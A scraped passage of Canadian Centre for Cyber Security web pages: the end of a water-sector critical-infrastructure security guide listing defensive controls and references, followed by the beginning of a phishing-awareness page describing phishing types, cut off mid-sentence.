<ul><li>vendor or maintenance accounts</li> <li>remotely accessible user and engineering workstations</li> <li>remotely accessible human-machine interfaces (HMIs)</li> </ul></details><details><summary><h4>Secure administrator workstation (CRG 2.21)</h4> </summary><p>Set up and enforce the use of a secure administrator workstation (SAW) for administrators to perform administrative tasks.</p> <p>A hardened <abbr title="secure administrator workstation">SAW</abbr>:</p> <ul><li>is not connected to the corporate <abbr title="information technology">IT</abbr> network</li> <li>is unable to install other software</li> <li>does not have access to the public Internet or email services</li> </ul><p>In cases where there is an operational requirement to use a <abbr title="secure administrator workstation">SAW</abbr> remotely, secure the <abbr title="secure administrator workstation">SAW</abbr> network traffic by using a layer 3 virtual private network (VPN). The protocols most widely used for <abbr title="virtual private network">VPN</abbr>s are:</p> <ul><li>Internet Protocol Security (IPSec)</li> <li>Transport Layer Security (TLS)</li> </ul><p>An <abbr title="Internet Protocol Security">IPSec</abbr> <abbr title="virtual private network">VPN</abbr> is an open standard, meaning that anyone can build a client or server that works with other <abbr title="Internet Protocol Security">IPSec</abbr> implementations. <abbr title="Internet Protocol Security">IPSec</abbr> <abbr title="virtual private network">VPN</abbr> encrypts and authenticates all data in both directions and can enforce no split tunneling from the <abbr title="secure administrator workstation">SAW</abbr>.</p> <p><abbr title="Transport Layer Security">TLS</abbr> <abbr title="virtual private network">VPN</abbr>s often use custom, non-standard features to tunnel traffic via <abbr title="Transport Layer Security">TLS</abbr>. <strong>Using custom or non-standard features creates additional risk exposure</strong>, even when the <abbr title="Transport Layer Security">TLS</abbr> parameters used by products are secure.</p> <p>Keep in mind that the public Internet may not be reliable in a global crisis or major disaster. As such, local administration must always be maintained as a capability in <abbr title="critical infrastructure">CI</abbr>.</p> </details><h3 class="text-info">Secure the supply chain</h3> <details><summary><h4>Vendor/supplier cyber security requirements (CRG 0.2)</h4> </summary><p>Include cyber security vendor/supplier requirements and questions in organizations’ procurement documents. Ensure those responses are evaluated such that, given two offerings of roughly similar cost and function, the more secure offering and/or supplier is preferred.</p> </details><h3 class="text-info">Prevent credential theft</h3> <details><summary><h4>Changing default passwords (CRG 2.0)</h4> </summary><p>Change default passwords and ensure your organization enforces a policy and/or process that requires changing default manufacturer passwords for all hardware, software and firmware.</p> <p>If feasible, change default passwords on Programmable Logic Controllers (PLCs) and Human Machine Interfaces (HMIs). Ensure the Unitronics <abbr title="Programmable Logic Controllers">PLC</abbr> default password “1111” is not in use.<sup id="fn33a-rf"><a class="fn-lnk" href="#fn33"><span class="wb-inv">Footnote </span>33</a></sup></p> </details><details><summary><h4>Email security (CRG 2.11)</h4> </summary><p>Secure all corporate email infrastructure to reduce the risk of common email-based threats such as spoofing, phishing and interception. On all corporate email infrastructure:</p> <ul><li>enable STARTTLS</li> <li>enable Sender Policy Framework and DomainKeys Identified Mail</li> <li>enable Domain-based Message Authentication, Reporting and Conformance (DMARC) and set to “reject”</li> <li>encrypt emails to an appropriate and approved level in accordance with the sensitivity of the email contents</li> </ul></details><details><summary><h4>Basic and <abbr title="operational technology">OT</abbr> cyber security training (CRG 2.8)</h4> </summary><p>Provide training that covers basic security and privacy concepts and foster an internal culture of security and cyber awareness. Ensure that personnel who maintain or secure <abbr title="operational technology">OT</abbr> as part of their regular duties receive <abbr title="operational technology">OT</abbr>-specific cyber security training at least annually. Training topics should include, at a minimum:</p> <ul><li>phishing</li> <li>business email compromise</li> <li>basic operational security</li> <li>password security</li> <li>privacy breaches</li> </ul></details><details><summary><h4>Disable macros by default (CRG 2.12)</h4> </summary><p>Establish a system-enforced policy that disables Microsoft Office macros or similar embedded code by default on all devices. If macros must be enabled in specific circumstances, set a policy that requires users to obtain authorization before macros are enabled for specific assets.</p> </details><h3 class="text-info">Protect internet-accessible vulnerable assets and services</h3> <details><summary><h4>No exploitable services on the internet (CRG 2.20)</h4> </summary><p>Do not expose exploitable services, like remote desktop protocol, to the Internet. Where services must be exposed, implement appropriate compensating controls to prevent common forms of exploitation.</p> </details><details><summary><h4>Limit <abbr title="operational technology">OT</abbr> connections to public Internet (CRG 2.18)</h4> </summary><p>Ensure no <abbr title="operational technology">OT</abbr> assets, including <abbr title="Programmable Logic Controllers">PLC</abbr>s, are connected to the public Internet.</p> <p>In exceptional operational circumstances where remote access to the <abbr title="Programmable Logic Controllers">PLC</abbr> is required, ensure that:</p> <ul><li>exceptions are justified and documented; and</li> <li>additional protections are in place to prevent and detect exploitation attempts such as: <ul><li>logging</li> <li><abbr title="multi-factor authentication">MFA</abbr></li> <li><abbr title="secure administrator workstation">SAW</abbr></li> <li>mandatory access via proxy or another intermediary</li> </ul></li> </ul></details><details><summary><h4>Network segmentation (CRG 2.5)</h4> </summary><p>Establish segmentation across network architecture to create boundaries and limit communication between <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> networks.</p> <p>Ensure that all connections to the <abbr title="operational technology">OT</abbr> network are denied by default unless explicitly allowed (for example, by IP address and port) for specific system functionality.</p> <p>Necessary communications paths between the <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> networks must pass through an intermediary (such as a properly configured firewall, bastion host, jump box or a demilitarized zone) which is closely monitored, captures network logs and only allows connections from approved assets.</p> </details><details><summary><h4>Mitigating known vulnerabilities (CRG 1.1)</h4> </summary><p>Apply patches for internet-facing systems within a risk-informed timespan, prioritizing the most critical assets first.</p> <p>Identify security vulnerabilities in your systems by conducting penetration tests and using automated vulnerability scanning tools, activities which are part of a comprehensive vulnerability management strategy.</p> <p>For <abbr title="operational technology">OT</abbr> assets where patching is not possible or may substantially compromise availability or safety, apply and record compensating controls (such as segmentation or monitoring). Sufficient controls either make the asset inaccessible from the public Internet or reduce the ability of threat actors to exploit the vulnerabilities in these assets.</p> </details><h3 class="text-info">Improve cyber security incident response capability</h3> <details><summary><h4>Incident response plans (CRG 1.3)</h4> </summary><p>Develop, maintain, update and regularly drill <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> cyber security incident response plans for both common and organization-specific threat scenarios and TTPs. Regularly test manual controls so that critical functions can keep running if <abbr title="operational technology">OT</abbr> networks need to be taken offline.</p> </details><details><summary><h4>Asset inventory and network topology (CRG 1.0)</h4> </summary><p>Maintain a regularly updated inventory of all assets within the organization’s <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> networks. Include accurate documentation of network topology and identified data assets. Immediately log any new asset that is integrated into the organization’s infrastructure.</p> </details><details><summary><h4>System backups and redundancy (CRG 2.14)</h4> </summary><p>Implement regular system backup procedures on both <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> systems. Ensure backups are stored separately from the source systems and test on a recurring basis.</p> <p>Ensure stored information for <abbr title="operational technology">OT</abbr> assets includes:</p> <ul><li>configurations</li> <li>roles</li> <li><abbr title="Programmable Logic Controllers">PLC</abbr> logic</li> <li>engineering drawings</li> <li>tools</li> </ul><p>Implement adequate redundancies such as network components and data storage.</p> <p>Ensure that the redundant secondary system is not collocated with the primary system and can be activated without loss of information or disruption to operations.</p> </details></div> </section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 class="text-info page-header mrgn-tp-xl" id="9">Additional resources</h2> <p><strong>Assess:</strong></p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessments">National Cyber Threat Assessments</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/baseline-cyber-threat-assessment-cybercrime">Baseline cyber threat assessment: Cybercrime</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/cyber-threat-supply-chains">The cyber threat from supply chains</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/cyber-threat-bulletin-cyber-threat-operational-technology">Cyber threat bulletin: Cyber threat to operational technology</a></li> </ul><p><strong>Prepare:</strong></p> <ul><li><a href="https://www.cyber.gc.ca/en/cyber-security-readiness/cyber-security-readiness-goals-securing-our-most-critical-systems">Cyber Security Readiness Goals: Securing Our Most Critical Systems</a></li> <li><a href="https://www.cyber.gc.ca/en/cyber-security-readiness/cross-sector-cyber-security-readiness-goals-toolkit">Cross-Sector Cyber Security Readiness Goals Toolkit</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/security-considerations-critical-infrastructure-itsap10100">Security considerations for critical infrastructure (ITSAP.10.100)</a></li> </ul><p><strong>Protect:</strong></p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/cyber-threat-bulletin-cyber-centre-reminds-canadian-critical-infrastructure-operators">Cyber threat bulletin: Cyber Centre reminds Canadian critical infrastructure operators to raise awareness and take mitigations against known Russian-backed cyber threat activity</a></li> <li><a href="https://www.cyber.gc.ca/en/news-events/joint-guidance-executives-and-leaders-critical-infrastructure-organizations-protecting-infrastructure-and-essential-functions-against-prc-cyber-activity">Joint guidance for executives and leaders of critical infrastructure organizations on protecting infrastructure and essential functions against <abbr title="People’s Republic of China">PRC</abbr> cyber activity</a></li> <li><a href="https://www.cyber.gc.ca/en/news-events/joint-advisory-prc-state-sponsored-actors-compromising-and-maintaining-persistent-access-us-critical-infrastructure-and-joint-guidance-identifying-and-mitigating-living-land-0">Joint advisory on <abbr title="People’s Republic of China">PRC</abbr> state-sponsored actors compromising and maintaining persistent access to U.S. critical infrastructure and joint guidance on identifying and mitigating living off the land</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/protect-your-operational-technology-itsap00051">Protect your operational technology (ITSAP.00.051)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/cyber-supply-chain-approach-assessing-risk-itsap10070">Cyber supply chain: An approach to assessing risk (ITSAP.10.070)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/protecting-your-organization-software-supply-chain-threats-itsm10071">Protecting your organization from software supply chain threats (ITSM.10.071)</a></li> </ul></section><!–FOOTNOTE SECTION EN–><aside class="wb-fnote" role="note"><h2 class="text-info" id="10">References</h2> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p>National Research Council (U.S.) Safe Drinking Water Committee. <a href="https://www.ncbi.nlm.nih.gov/books/NBK234165/">Drinking Water and Health: Volume 1. Historical Note</a>. National Academies Press. 1977.</p> <p class="fn-rtn"><a href="#fn1-rf"><span class="wb-inv">Return to footnote</span>1<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 2</dt> <dd id="fn2"> <p>City of Calgary Newsroom. <a href="https://newsroom.calgary.ca/update-2-critical-water-main-break-affecting-city-wide-water-usage/">Update June 6: Critical water main break affecting City wide water usage</a>. June 6, 2024; Matthew Lapierre. <a href="https://www.cbc.ca/news/canada/montreal/muhc-water-main-break-1.7261560">Services resuming at MUHC Glen site after major water main break</a>. CBC News. July 12, 2024.</p> <p class="fn-rtn"><a href="#fn2-rf"><span class="wb-inv">Return to footnote</span>2<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 3</dt> <dd id="fn3"> <p>Public Safety Canada. <a href="https://www.publicsafety.gc.ca/cnt/ntnl-scrt/crtcl-nfrstrctr/cci-iec-en.aspx">Canada’s Critical Infrastructure</a>. May 19, 2020.</p> <p class="fn-rtn"><a href="#fn3-rf"><span class="wb-inv">Return to footnote</span>3<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 4</dt> <dd id="fn4"> <p>Public Safety Canada. <a href="https://www.publicsafety.gc.ca/cnt/rsrcs/pblctns/srtg-crtcl-nfrstrctr/index-en.aspx">National Strategy for Critical Infrastructure</a>. June 1, 2021.</p> <p class="fn-rtn"><a href="#fn4-rf"><span class="wb-inv">Return to footnote</span>4<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 5</dt> <dd id="fn5"> <p>Government of Canada. <a href="https://www.canada.ca/en/environment-climate-change/services/water-overview/governance-legislation/shared-responsibility.htm">Water governance and legislation: shared responsibility</a>. Retrieved December 1, 2024.</p> <p class="fn-rtn"><a href="#fn5-rf"><span class="wb-inv">Return to footnote</span>5<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 6</dt> <dd id="fn6"> <p>Canadian Centre for Cyber Security. <a href="https://cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2020">National Cyber Threat Assessment 2020</a>. November 16, 2020.</p> <p class="fn-rtn"><a href="#fn6-rf"><span class="wb-inv">Return to footnote</span>6<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 7</dt> <dd id="fn7"> <p>Ariel Stern, Yair Poleg. <a href="https://www.watercanada.net/feature/cyber-security-for-water-utilities/">Cyber security for water utilities</a>. Water Canada. August 9, 2021.</p> <p class="fn-rtn"><a href="#fn7-rf"><span class="wb-inv">Return to footnote</span>7<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 8</dt> <dd id="fn8"> <p>Kevin Johnson, Pete Perciavalle and D. Wilcoxson. <a href="https://www.stantec.com/en/ideas/spotlight/2023/chicago-red-line/time-to-invest-water-automation-how-to-tackle-5-operational-technology-challenges">How to tackle 5 operational technology challenges for water utilities</a>. May 15, 2024.</p> <p class="fn-rtn"><a href="#fn8-rf"><span class="wb-inv">Return to footnote</span>8<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 9</dt> <dd id="fn9"> <p>Magnus Arnell, Maya Miltell and Gustaf Olsson. <a href="https://www.sciencedirect.com/science/article/pii/S2589914723000063">Making waves: A vision for digital water utilities</a>. Water Research 19:7. May 1, 2023.</p> <p class="fn-rtn"><a href="#fn9-rf"><span class="wb-inv">Return to footnote</span>9<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 10</dt> <dd id="fn10"> <p>Canadian Centre for Cyber Security. <a href="https://cyber.gc.ca/en/guidance/cyber-threat-bulletin-cyber-threat-operational-technology">Cyber Threat Bulletin: The Cyber Threat to Operational Technology</a>. December 16, 2021.</p> <p class="fn-rtn"><a href="#fn10-rf"><span class="wb-inv">Return to footnote</span>10<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 11</dt> <dd id="fn11"> <p>Censys. <a href="https://censys.com/blog/research-report-internet-connected-industrial-control-systems-part-one">Research Report: Internet-Connected Industrial Control Systems</a>. August 7, 2024.</p> <p class="fn-rtn"><a href="#fn11-rf"><span class="wb-inv">Return to footnote</span>11<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 12</dt> <dd id="fn12"> <p>MITRE. <a href="https://www.mitre.org/news-insights/publication/malicious-control-system-cyber-security-attack-case-study-maroochy-0">Malicious Control System Cyber Security Attack Case Study: Maroochy Water Services, Australia</a>. August 1, 2008.</p> <p class="fn-rtn"><a href="#fn12-rf"><span class="wb-inv">Return to footnote</span>12<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 13</dt> <dd id="fn13"> <p>Tony Smith. <a href="https://www.theregister.com/2001/10/31/hacker_jailed_for_revenge_sewage/">Hacker jailed for revenge sewage attacks</a>. The Register. October 31, 2001.</p> <p class="fn-rtn"><a href="#fn13-rf"><span class="wb-inv">Return to footnote</span>13<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 14</dt> <dd id="fn14"> <p>Global Affairs Canada. <a href="https://www.canada.ca/en/global-affairs/news/2021/04/statement-on-solarwinds-cyber-compromise.html">Statement on SolarWinds Cyber Compromise</a>. April 15, 2021.</p> <p class="fn-rtn"><a href="#fn14-rf"><span class="wb-inv">Return to footnote</span>14<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 15</dt> <dd id="fn15"> <p>Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa18-284a">Cybersecurity Advisory AA18-284A – Publicly Available Tools Seen in Cyber Incidents Worldwide</a>. June 30, 2020; Joao Marques, John Fokker and Leandro Velasco. <a href="https://www.trellix.com/blogs/research/disrupting-cobalt-strike-with-threat-intelligence/">Cracking Cobalt Strike</a>. Trellix. July 3, 2024.</p> <p class="fn-rtn"><a href="#fn15-rf"><span class="wb-inv">Return to footnote</span>15<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 16</dt> <dd id="fn16"> <p>Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a">Cybersecurity Advisory AA24-038A – <abbr title="People’s Republic of China">PRC</abbr> State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure</a>. February 7, 2024; Jungsoo An, Asheer Malhotra, Brandon White and Vitor Ventura. <a href="https://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/">UAT-5918 targets critical infrastructure entities in Taiwan</a>. Talos. March 20, 2025; Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200a">Cybersecurity Advisory AA21-200A – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department</a>. July 20, 2021.</p> <p class="fn-rtn"><a href="#fn16-rf"><span class="wb-inv">Return to footnote</span>16<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 17</dt> <dd id="fn17"> <p>Bart Lenaerts-Bergmans. <a href="https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/living-off-the-land-attack/">What are living off the Land (LOTL) attacks?</a> CrowdStrike. February 21, 2023.</p> <p class="fn-rtn"><a href="#fn17-rf"><span class="wb-inv">Return to footnote</span>17<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 18</dt> <dd id="fn18"> <p>Microsoft Threat Intelligence. <a href="https://www.microsoft.com/en-us/security/blog/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/">Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV | Microsoft Security Blog</a>. September 17, 2018.</p> <p class="fn-rtn"><a href="#fn18-rf"><span class="wb-inv">Return to footnote</span>18<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 19</dt> <dd id="fn19"> <p>Canadian Centre for Cyber Security. <a href="https://www.cyber.gc.ca/en/guidance/baseline-cyber-threat-assessment-cybercrime">Baseline cyber threat assessment: Cybercrime</a>. August 28, 2023.</p> <p class="fn-rtn"><a href="#fn19-rf"><span class="wb-inv">Return to footnote</span>19<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 20</dt> <dd id="fn20"> <p>Federal Bureau of Investigation Internet Crime Complaint Center. <a href="https://www.ic3.gov/AnnualReport/Reports/2023_IC3Report.pdf">Internet Crime Report 2023</a>. April 4, 2024; Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/resources-tools/resources/ransomware-threat-ot">Ransomware Threat to <abbr title="operational technology">OT</abbr></a>. June 9, 2021.</p> <p class="fn-rtn"><a href="#fn20-rf"><span class="wb-inv">Return to footnote</span>20<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 21</dt> <dd id="fn21"> <p>Trend Micro. <a href="https://newsroom.trendmicro.com/2022-06-02-Cyber-Attacks-on-Industrial-Assets-Cost-Firms-Millions">Cyber-Attacks on Industrial Assets Cost Firms Millions</a>. June 2, 2022.</p> <p class="fn-rtn"><a href="#fn21-rf"><span class="wb-inv">Return to footnote</span>21<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 22</dt> <dd id="fn22"> <p>Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-287a">Cybersecurity Advisory AA21-287A – Ongoing Cyber Threats to U.S. Water and Wastewater Systems</a>. October 25, 2021; Sergiu Gatlan. <a href="https://www.bleepingcomputer.com/news/security/kansas-water-plant-cyberattack-forces-switch-to-manual-operations/">Kansas water plant cyberattack forces switch to manual operations</a>. September 24, 2024.</p> <p class="fn-rtn"><a href="#fn22-rf"><span class="wb-inv">Return to footnote</span>22<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 23</dt> <dd id="fn23"> <p>SANS Institute. <a href="https://www.sans.org/blog/ransomware-cases-increased-greatly-in-2023/">Ransomware Cases Increased by 73% in 2023 showing our actions have not been enough to thwart the threat</a>. January 15, 2024; Sophos. <a href="https://news.sophos.com/en-us/2024/04/30/the-state-of-ransomware-2024/">The State of Ransomware 2024</a>. April 30, 2024; Verizon. <a href="https://www.verizon.com/about/news/2023-data-breach-investigations-report">2023 Data Breach Investigations Report: frequency and cost of social engineering attacks skyrocket</a>. June 6, 2023; Fortinet. <a href="https://www.fortinet.com/content/dam/fortinet/assets/reports/report-2023-ransomware-global-research.pdf">The 2023 Global Ransomware Report</a>. April 20, 2023.</p> <p class="fn-rtn"><a href="#fn23-rf"><span class="wb-inv">Return to footnote</span>23<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 24</dt> <dd id="fn24"> <p>Canadian Centre for Cyber Security. <a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a>. October 30, 2024.</p> <p class="fn-rtn"><a href="#fn24-rf"><span class="wb-inv">Return to footnote</span>24<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 25</dt> <dd id="fn25"> <p>Microsoft Threat Intelligence. <a href="https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/">Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself</a>. May 9, 2022.</p> <p class="fn-rtn"><a href="#fn25-rf"><span class="wb-inv">Return to footnote</span>25<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 26</dt> <dd id="fn26"> <p>Alicia Hope. <a href="https://www.cpomagazine.com/cyber-security/water-companies-veolia-north-america-and-uks-southern-water-ransomware-attack-and-data-breach-leaked-pii/">Water Companies Veolia North America and UK’s Southern Water Ransomware Attack and Data Breach Leaked PII</a>. CPO Magazine. February 2, 2024.</p> <p class="fn-rtn"><a href="#fn26-rf"><span class="wb-inv">Return to footnote</span>26<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 27</dt> <dd id="fn27"> <p>Canadian Centre for Cyber Security. <a href="https://cyber.gc.ca/en/guidance/cyber-threat-bulletin-ransomware-threat-2021">Cyber threat bulletin: The ransomware threat in 2021</a>. December 16, 2021.</p> <p class="fn-rtn"><a href="#fn27-rf"><span class="wb-inv">Return to footnote</span>27<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 28</dt> <dd id="fn28"> <p>U.S. Department of Justice. <a href="https://www.justice.gov/archives/ag/page/file/1076696/download">Report of The Attorney General’s Cyber Digital Task Force</a>. July 2, 2018; Joseph Berger. <a href="https://www.nytimes.com/2016/03/26/nyregion/rye-brook-dam-caught-in-computer-hacking-case.html">A Dam, Small and Unsung, Is Caught Up in an Iranian Hacking Case</a>. The New York Times. March 25, 2016.</p> <p class="fn-rtn"><a href="#fn28-rf"><span class="wb-inv">Return to footnote</span>28<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 29</dt> <dd id="fn29"> <p>Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a">Cybersecurity Advisory AA23-335A – IRGC-Affiliated Cyber Actors Exploit <abbr title="Programmable Logic Controllers">PLC</abbr>s in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities</a>. December 18, 2024.</p> <p class="fn-rtn"><a href="#fn29-rf"><span class="wb-inv">Return to footnote</span>29<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 30</dt> <dd id="fn30"> <p>Microsoft Security Blog. <a href="https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/">Volt Typhoon targets U.S. critical infrastructure with living-off-the-land techniques</a>. May 24, 2023.</p> <p class="fn-rtn"><a href="#fn30-rf"><span class="wb-inv">Return to footnote</span>30<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 31</dt> <dd id="fn31"> <p>CISA. <a href="https://www.cisa.gov/sites/default/files/2024-05/defending-ot-operations-against-ongoing-pro-russia-hacktivist-activity-508c.pdf">Defending <abbr title="operational technology">OT</abbr> Operations against Ongoing Pro-Russia Hacktivist Activity</a>. May 1, 2024.</p> <p class="fn-rtn"><a href="#fn31-rf"><span class="wb-inv">Return to footnote</span>31<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 32</dt> <dd id="fn32"> <p>U.S. Department of the Treasury. <a href="https://home.treasury.gov/news/press-releases/jy2473">Press Release – Treasury Sanctions Leader and Primary Member of the Cyber Army of Russia Reborn</a>. July 19, 2024.</p> <p class="fn-rtn"><a href="#fn32-rf"><span class="wb-inv">Return to footnote</span>32<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 33</dt> <dd id="fn33"> <p>Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/alerts/2023/11/28/exploitation-unitronics-plcs-used-water-and-wastewater-systems">Alert – Exploitation of Unitronics <abbr title="Programmable Logic Controllers">PLC</abbr>s used in Water and Wastewater Systems</a>. November 28, 2023.</p> <p class="fn-rtn"><a href="#fn33-rf"><span class="wb-inv">Return to footnote</span>33<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside></div> </div> </div> </div> </div> </article>

<article data-history-node-id="734" about="/en/guidance/dont-take-bait-recognize-and-avoid-phishing-attacks" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–Info across the top under the image–> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>November 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Awareness series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSAP.00.101</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>November 2025 | Awareness series</strong></p> </div> <!–pdf download–> <div class="col-md-12 mrgn-tp-lg"><!–<div class="mrgn-bttm-md well well-sm col-md-4 pull-right mrgn-lft-md col-sm-12 col-xs-12"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/ITSAP00101-e.pdf">Don’t take the bait: Recognize and avoid phishing attacks&nbsp;- ITSAP.00.101 (PDF,&nbsp;307&nbsp;KB)</a></p> </div>–> <p>Phishing is a form of social engineering where threat actors send communications that appear legitimate to trick or motivate individuals into:</p> <ul><li>revealing sensitive or personal information</li> <li>clicking on links that direct them to malicious websites</li> <li>downloading malicious attachments</li> <li>transferring money</li> </ul><section><h2 class="text-info h3">On this page</h2> <ul><li><a href="#1">Types of phishing</a></li> <li><a href="#2">Artificial intelligence and phishing</a></li> <li><a href="#3">How to identify a phishing attack</a></li> <li><a href="#4">How to protect your organization from phishing</a></li> <li><a href="#5">Learn more</a></li> </ul></section></div> </div> <h2 class="text-info" id="1">Types of phishing</h2> <p>Phishing attempts are often generic mass messages that appear to be legitimate messages from a trusted source (for example, a bank, online retailer, courier service, or utility company). Threat actors often take advantage of crises, conflicts or world events to launch phishing attacks against individuals, financial institutions, governments and critical infrastructure sectors.</p> <p>The are several types of phishing.</p> <h3>Deceptive phishing</h3> <p>Deceptive phishing is one of the most common types of attack and occurs when a cybercriminal pretends to be a legitimate company to steal your personal information or login credentials. The threat actor may send you a link to a fraudulent website that closely mimics an official site, using deliberate misspellings that look almost identical to a legitimate URL. Threat actors may also send a quick response (QR) code, which makes it more difficult for potential victims to spot the attack.</p> <p>Common deceptive phishing techniques include:</p> <ul><li><strong>homograph exploits:</strong> threat actors use characters from different alphabets (for example, Cyrillic or Greek) that look almost identical to standard Latin letters but are coded differently, for example in “www.<span>аррle</span>.com” the “a” and “p” are from the Cyrillic alphabet, but look like their Latin counterparts</li> <li><strong>typo squatting:</strong> threat actors register domain names that are common misspellings of well-known websites, exploiting typing errors so that potential victims are not always aware that they are on the wrong website</li> <li><strong>legitimate-looking subdomains:</strong> threat actors take control of a subdomain that is no longer actively used by its legitimate owner or create subdomains that mimic legitimate ones (for example, “login.google.com.example.com” instead of “login.google.com”), often using names, logos or branding elements that are similar to legitimate ones</li> </ul><h3>Spear phishing</h3> <p>Spear phishing is a personalized attack that targets a specific individual, company or organization. The message includes personal details about the potential victim, such as interests, recent online activities or purchases.</p> <h3>Whaling</h3> <p>Whaling is a personalized attack that targets a big “phish” like a CEO or executive. A threat actor chooses these targets because of their level of authority and possible access to more sensitive information or large amounts of money.</p> <h3>Quishing</h3> <p>Quishing is a phishing attack that uses <abbr title="quick response">QR</abbr> codes. The threat actor may send a <abbr title="quick response">QR</abbr> code via email, cover a legitimate <abbr title="quick response">QR</abbr> code with a malicious <abbr title="quick response">QR</abbr> code or place a malicious <abbr title="quick response">QR</abbr> code in a public, high-traffic area. The victim scans the <abbr title="quick response">QR</abbr> code, which redirects them to a malicious website. Quishing can bypass email security protection that scans for malicious links and attachments.</p> <h3>Smishing</h3> <p>A smishing attack uses deceptive short message service (SMS), also known as text messages, to manipulate victims into divulging sensitive personal information such as bank account details, credit card numbers or login credentials.</p> <h3>Vishing</h3> <p>Vishing is short for “voice phishing” and involves defrauding people over the phone and getting them to divulge sensitive information. A threat actor can fake or spoof their caller ID information or use a voice changer to make victims 